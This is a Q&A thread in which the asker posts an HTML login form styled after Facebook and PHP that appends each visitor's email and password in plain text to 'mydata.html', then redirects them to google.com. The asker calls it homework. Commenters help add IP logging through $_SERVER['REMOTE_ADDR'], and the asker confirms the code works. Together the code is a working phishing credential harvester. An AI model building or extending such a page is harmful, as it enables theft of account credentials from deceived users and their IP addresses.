# Write (fwrite) the form fields plus the ip address

Tags: php, file, fopen

I'm trying to make a little form. This form has to include email address and password + the ip addresses. Here's the code:

Form:

```
<form action="action.php" method="POST" role="form">
  <div class="panel panel-default">
    <div class="panel-heading">            
       <input name="name"type="email" id="fb_input-3"class="fb_input form-control" id="email" placeholder="Email or Phone">
    </div>
    <div class="panel-body"> 
       <input name="pass"type="password" id="fb_input"class="fb_input form-control" id="pwd" placeholder="Password">
     </div>
     <div id="panel_btn"class="panel-footer">
       <button name="submit"id="login_btn"type="submit" class="btn btn-primary btn-block"><strong>Log In</strong></button>
     </div>
   </div>
</form>
```

php:

```
<?php

  $myfile = fopen("mydata.html", "a+");
  $txt = "Login Email : ".$_POST['name']." -> Password : ".$_POST['pass']."<br/>";
  fwrite($myfile, $txt);
  fclose($myfile);

  if ($txt == true) {
    header('Location: http://www.google.com');
  }

?>
```

As you can see, the email and the password are being written in "mydata.html", but I need to write the ip address as well.

This code is working perfectly, so what I need is to add the ip address of the visitor, the email and the password are working perfectly! But I need the ip.

How can I do that?

I couldn't find any post with those details.

Comment: See http://php.net/manual/en/reserved.variables.server.php `REMOTE_ADDR`. Passwords shouldn't be stored in plain text.

Comment: no idea why you're not using a database for this. Text files are a lot of work.

Comment: @chris85  I tryed this : <?php


    $myfile = fopen("mydata.html", "a+");
    $txt = "Login Email : ".$_POST['name']." -> Password : ".$_POST['pass']."<br/>";
    $ip = "IP ADDRESS". $REMOTE_ADDR;
    fwrite($myfile, $txt,$ip);
    fclose($myfile);

    if ($txt == true) {
      header('Location: http://www.google.com');
    }
?>
------------
but it doesnt work.
-------------
and about "Passwords shouldn't be stored in plain text" yes thank you but basically this is just a homework, I can use favorite color, birthday whatever I want but the main purpose is write 2 fields plus the ip address.

Comment: @fredd -ii- basically this is a homework and it must be in a html file or txt instead of database..

Comment: @Araldy Click the link I sent. `$_SERVER` is a superglobal, the key is `REMOTE_ADDR`.

Comment: @chris85 thanks for being my hero! it works perfect!